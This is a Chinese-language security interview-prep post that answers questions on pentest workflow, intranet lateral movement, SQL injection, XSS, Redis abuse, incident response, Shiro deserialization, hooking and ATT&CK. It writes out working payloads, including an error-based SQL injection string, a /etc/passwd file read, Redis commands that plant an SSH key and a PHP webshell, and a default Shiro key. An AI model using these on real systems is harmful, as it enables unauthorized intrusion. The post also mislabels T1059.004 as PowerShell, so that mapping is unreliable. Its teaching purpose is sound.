安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2. 渗透测试流程 & 内网渗透经验
3. SQL注入报错利用
4. XSS利用(反射型/DOM型)
5. Redis未授权利用
6. 应急响应流程(无安全设备场景)
7. 手动检测Shiro反序列化漏洞
8. 漏洞研究与开发能力
9. Hook技术理解
10. ATT&CK框架应用深度
2、渗透测试流程,有没有打过内网 3、SQL注入,报错 4、XSS,反射/DOM型,怎么利用 5、Redis的利用 6、应急响应能力怎么样,处置流程思路 7、无态势感知,安全设备,怎样手动发现shiro反序列化漏洞进来都攻击 8、平时有分析研究漏洞吗,编写exp,熟悉什么开发语言 9、关于hook了解 10、ATT&CK框架了解吗、到什么程度,是否有过应用
2. 渗透测试流程 & 内网渗透经验
渗透测试标准流程 (PTES框架精简版):
- 情报收集:资产探测(域名/端口/服务)、员工信息、供应链漏洞
- 威胁建模:确定高价值目标(数据库、域控)、绘制攻击路径
- 漏洞分析:自动化扫描 + 手动验证(避免误报)
- 渗透利用:获取初始立足点 → 权限提升 → 横向移动
- 后渗透:敏感数据定位、权限维持(后门/黄金票据)、痕迹清理
- 报告输出:风险评级、漏洞复现步骤、修复方案
内网渗透实战要点:
- ✔️ 打点案例:通过Web应用漏洞(如Spring Boot Actuator未授权)进入内网
- ✔️ 横向移动:
- 协议利用:NTLM Relay攻击、SMB爆破/MS17-010
- 凭据窃取:Mimikatz提取密码、Kerberoasting攻击SPN账户
- ✔️ 域控突破:利用AD组策略漏洞(GPP密码解密)、ZeroLogon (CVE-2020-1472)
- ✔️ 隐蔽隧道:DNS/ICMP隧道绕过网络监控,使用Chisel进行端口转发
3. SQL注入报错利用
报错注入核心原理:触发数据库强制报错,使错误信息包含查询结果
经典Payload示例:sql
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--
关键利用场景:
- 数据库版本识别:
@@version
- 数据提取:
CONCAT((SELECT user()),0x3a,...)
- 文件读取:
LOAD_FILE('/etc/passwd')
(需FILE权限)- OOB外带数据:结合
DNS
查询(如Oracle的UTL_HTTP)
4. XSS利用(反射型/DOM型)
类型 利用场景 实战案例 反射型 钓鱼攻击、Cookie劫持 伪造登录页诱导用户提交凭证 DOM型 前端框架漏洞(如AngularJS沙箱逃逸) 修改客户端代码绕过安全检测 高级利用技巧:
- CORS绕过:利用信任域发起跨域请求窃取数据
- 结合CSRF:触发敏感操作(如修改密码)
- 浏览器漏洞:配合BeEF框架利用浏览器0day(如CVE-2023-3079)
5. Redis未授权利用
四大攻击路径:
- 写入SSH公钥
bash
redis-cli -h 目标IP flushall redis-cli -h 目标IP set payload "公钥内容" redis-cli -h 目标IP config set dir /root/.ssh/ redis-cli -h 目标IP config set dbfilename authorized_keys
- Webshell写入
redis
config set dir /var/www/html config set dbfilename shell.php set x "<?php system($_GET['cmd']);?>" save
- 主从复制RCE:利用模块如RedisRogue
- Crontab定时任务:写入反弹Shell脚本
6. 应急响应流程(无安全设备场景)
处置四步法:
- 快速隔离:
- 拔网线 > 防火墙阻断 > 关机(权衡业务影响)
- 痕迹固定:
- 内存镜像(Volatility)
- 磁盘快照(dd / FTK Imager)
- 入侵溯源:
- 重点检查:计划任务、启动项、异常进程(
ps -aux | grep可疑名
)- 日志分析:
bash
grep -E 'Accepted|Failed' /var/log/auth.log # SSH登录审计 journalctl -u sshd --since "2 hours ago" # 时间范围检索
- 恢复加固:
- 重置所有凭证(包括服务账户)
- 修补漏洞(参考MITRE CVE数据库)
7. 手动检测Shiro反序列化漏洞
无设备条件下的三步排查法:
- 特征识别:
- 检查Cookie中是否存在
rememberMe=deleteMe
- 观察HTTP响应头中的
Set-Cookie: rememberMe=...
- 密钥爆破:
- 使用工具ShiroAttack2 爆破常见密钥(kPH+bIxk5D2deZiIxcaaaA==)
- 流量分析:
- Wireshark过滤特征:
TCP contains "rememberMe"
- 检测异常Java序列化流头:
aced 0005
(Hex)
8. 漏洞研究与开发能力
- 研究方向:重点跟踪Java生态漏洞(Spring/Log4j2)、云原生漏洞(K8s提权)
- EXP开发:
- 语言:Python(POC框架)、Go(高并发利用)、Java(内存马注入)
- 案例:曾复现Apache Dubbo CVE-2023-23638并编写RCE利用脚本
- 工具贡献:提交PR修复Sqlmap中Shiro密钥检测模块的误报问题
9. Hook技术理解
安全领域的Hook应用:
类型 实现方式 防御对抗用途 用户态 Detours(Windows API劫持) 监控敏感API调用(如WriteProcessMemory) 内核态 SSDT Hook(Windows) 隐藏进程/端口 浏览器 Chrome扩展(manifest V3) 检测恶意JS执行链 实战案例:
- 使用Frida框架Hook Android应用SSL证书验证函数绕过双向认证
10. ATT&CK框架应用深度
掌握程度:
- 矩阵映射:在报告中标注攻击技术ID(如T1059.004 - PowerShell)
- 战术应用:
- 红队:基于TA0008(横向移动)设计域渗透路径
- 蓝队:针对T1547.001(注册表自启动)部署EDR检测规则
项目实践:
- 利用ATT&CK Navigator设计企业威胁覆盖热力图
- 将蜜罐捕获的攻击行为映射到TTPs(如APT29常用T1078.004 - 云账户)
- 开发自动化工具关联Sigma规则与ATT&CK技术编号